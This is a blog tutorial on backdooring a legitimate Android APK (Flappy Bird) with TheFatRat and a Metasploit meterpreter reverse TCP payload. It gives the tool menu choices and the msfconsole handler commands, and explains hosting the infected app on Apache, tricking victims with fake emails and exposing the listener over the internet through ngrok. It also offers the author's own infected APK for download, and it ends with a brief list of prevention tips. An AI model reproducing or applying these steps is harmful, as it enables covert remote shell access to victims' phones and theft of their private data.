Backdooring Android Apps with FatRat and Metasploit Framework

We have to set a point, mobile applications are a HUGE market today. Many entrepreneurs left behind web-based experiences for building disruptive mobile solutions. The battle of smart-phones remains today between IOsand Android. Both have pros and cons, they are designed and configured with default security settings that maybe not the ideal for non-experienced people.

This writing demonstrates a practical and simple example on how to generate a Reverse TCP back-door on an existing APK file.

This is a pretty common “Social Engineering Attack”, and it’s focused on generating a reverse TCP connection, where the attacker easily can generate shell access to your Android phone in the time you are using the infected application and do some harmful stuff or access your private information without any concern.

And when a mean “Social Engineering Attacks” is because the way it propagates, I’ll explain in a bit how are the typical phases of this attacks.

This demo was created on a controller and local lab, but it can be done on WAN networks easily.

Social Engineering (in simple words)

In order to explain the concept very clearly, we can split the term into two elements, where Social can set up as personal and professional livesEngineering refers to performing tasks by following certain steps to achieving targets. That combined.

Social Engineering is a term that describes nontechnical intrusion that relies heavily on human interaction by tricking other people to break normal security procedures.

It’s pretty simple, really. It’s all about mocking or tricking people to use or download a Malware and take advantage of it for malicious purposes.

Social Engineering Phases

The attack can be summarized in something like this:

  1. Research: tries to gather information about the target, collected from various resources (dumpster living, website, docs, interactions).
  2. Hook: makes the initial move by trying to start a conversation with the selected target after the completion of the research phase.
  3. Play: make the relationship stronger and continue the dialog to exploit the relationship and get the desired information.
  4. Exit: walks out of the attack scene of stops the communication with the target without creating a scene or doing any suspicious.

The working lab

A virtualized Kali Linux 2018.4 64 bits on Oracle Virtualbox.

Samsung Galaxy S6 with Android 4.4 Kitkat with some regular security configurations.

Both machines were connected on the same LAN Network.


The key tool for this workshop is the FatRat Exploitation tool, this program is written in Python, can easily generate backdoors on any existing Android application or almost any other device available with known payloads from the Metasploit Framework (and other payloads as well). This tool can perform a lot of other things, you can check the tool’s GitHub page here.

The installation process is quite simple, just keep in mind that can take some time because the dependencies installed.

Important: upgrade and update your Kali repositories before installing it, this can save you time.

Great, let’s install FatRat:

  1. Clone the repository from GitHub:
  2. git clone
  3. Inside the cloned repository, you will change the permissions on the file for making it an executable file
  4. cd TheFatRatchmod +x && ./
  5. Follow the instructions

On the other side, we have the Metasploit Framework, this is an Open Source penetration tool used for developing and executing exploit code against remote target machines. Can be used to test vulnerabilities of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

This amazing tool is already installed on the Kali Linux OS.

Let’s pause a bit.

At this moment (if this your first time hearing about Metasploit Framework) I’ll need to go deeper on this explanation, because, there are some key terms that may be a little bit confusing for you. I previously said that this tool is used to test vulnerabilities, right? A vulnerability is a weakness that can compromise the security of any system.

This vulnerability is exploited by using an exploit, this exploit refers to software code which allows an attacker to take advantage of a vulnerability.

And finally, when the vulnerability is exploited, the payload acts, this means, we run some code on the target system for enabling the exploitation to persist on time

With all that said. Let’s work.


In this example, I downloaded the Flappy Bird APK from here

This is the authentic APK game.

I personally renamed the download name to a simple flappybird.apk file and move it from the downloads directory to a custom folder named backdooring-android (this is optional)

Using FatRat

When I was installing FatRat on my Kali, the installer asked if I want to set the fatrat command globally, I said yes, this maybe can differ from your process

  1. By typing fatrat the system will evaluate and configure the necessary and available services
  2. Type 5, for Backdooring Original apk [Instagram, Line,etc]
  3. Set up the Local Host (LHOST) and Local Port (LPORT). This will represent the Host machine IP address (Kali) and any unused port for hearing back the TCP session handshake (I’ll explain this later)
  4. Now, we have to type the location path of the flappybird.apk, in my case is on /root/backdooring-android/flappybird.apk
  5. Setting up the payload (Metasploit term) for the reverse TCP. Select the option 3: android/meterpreter/reverse_tcp
  6. Select 1: Use Backdoor-apk 0.2.2 this is the tool for creating the infected APK

And that’s it. Meanwhile, FatRat will decompile the original APK and after some internal process will generate a new infected APK with the default name of app_backdoor.apk

After this, we set the generate the listener to no, we are going to generate it manually using Metasploit Framework

Creating the listener manually

The second part of this attack consists of setting the Host Machine (Kali) as a listener on the bidirectional TCP connection, that’s the main purpose of Reverse TCP shell attack through Social Engineering. The attack will have shell access to the Android machine without the user notice.

Let’s start by starting the msfconsole command

> msfconsole

After this, we set the multi/handler exploit like this

> use multi/handler

Later, setting the payload (the same on the FatRat process)

> set PAYLOAD android/meterpreter/reverse_tcp> set LHOST [the same as your Kali IP]> set LPORT [The same as FatRat process]

> exploit (running)

Checking the Apache service status (it’s already installed)

systemctl status apache2

Starting the service

systemctl start apache2

Placing the infected backdoor (renamed-or-not) for the victims

/var/www/html/ directory


In this LAN network environment, the attacker needs to expose this new infected APK on the Apache Server to the victim, by sending a fake email with the link or any other way for tricking the people to download the new “ FlappyBird.apk” on their Android device.

Once the victim downloads the application and opens it, a new session on the listener will be created successfully, using the meterpreter (payload) shell.

The attacker has now the complete access to target custom attacks or performs some privilege escalation from the CLI.

You can list the sessions, like:

And you also can select and interact with an active session using the -i flag

> sessions -i 1

You can download my infected FlappyBird.apk file here

I’m not pretty sure if by setting your Kali machine with a static IP address just like the one I used to, can make this Malware works correctly. But, if it’s the case, my working IP address was a class C IP address the 4444 port.

From LAN to WAN

A simple way to scaling a local IP address is using a simple tunneling tool called ngRok. This tool converts a simple to something accessible to all public.

Check the docs for installation steps and auth token setup.

After that, you can set the ngrok command for TCP connections, like:

ngrok tcp 1234 for TCP protocol on the 1234 protocol

The whole process is the same, but you will need to replace the LHOST(Web interface from ngrok) and LPORT (the port from the ngrok TCP connection) to the elements that ngrok provided to you.

Tips for preventing

  1. Keep your Android device up to date (patches and OS version)
  2. NEVER download any .apk from non-trusted sources
  3. Always check the URL for intentional misspelled domain names
  4. Educate yourself
About the Author
Cyber Security ; News ; Research Hacking; Pentesting, Wireless, Exploits

Leave a Reply


doce + 3 =

Bad Authentication data.